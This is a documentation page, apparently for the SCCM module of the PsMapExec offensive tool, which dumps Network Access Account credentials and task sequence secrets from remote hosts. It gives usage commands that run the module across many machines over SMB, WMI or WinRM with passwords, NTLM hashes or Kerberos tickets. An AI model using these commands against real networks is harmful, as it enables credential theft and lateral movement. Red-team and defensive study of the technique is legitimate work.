SCCM

Dumps local SCCM secrets for Network Access Account credentials and Task sequence data. Collected information is automatically parsed and organized where it will be stored in $PWD\PME\SCCM\.

Uses a stripped down and revised version of SharpSCCM for execution.

Supported Methods

SMB
SessionHunter (WMI)
WMI
WinRM

Optional Parameters

Parameter

Value

Description

-NoParse

N/A

Will ommit parsing output from each system.

-ShowOutput

N/A

Displays each targets output to the console

-SuccessOnly

N/A

Display only successful results

Usage Examples

# SMB execution with password authentication, targeting workstations
PsMapExec -Targets "Workstations" Method "SMB" -Username [User] -Password [Pass]     -Module SCCM

# WinRM execution with hash authentication, targeting servers
PsMapExec -Targets "Servers" -Username [User] -Hash [RC4/AES256/NTLM] -Module SCCM -Method "WinRM"

# WMI execution with Kerberos ticket authentication (Username not required)
PsMapExec -Targets "All" -Method "WMI" -Ticket [doI..] -Module SCCM

Last updated 7 months ago

Was this helpful?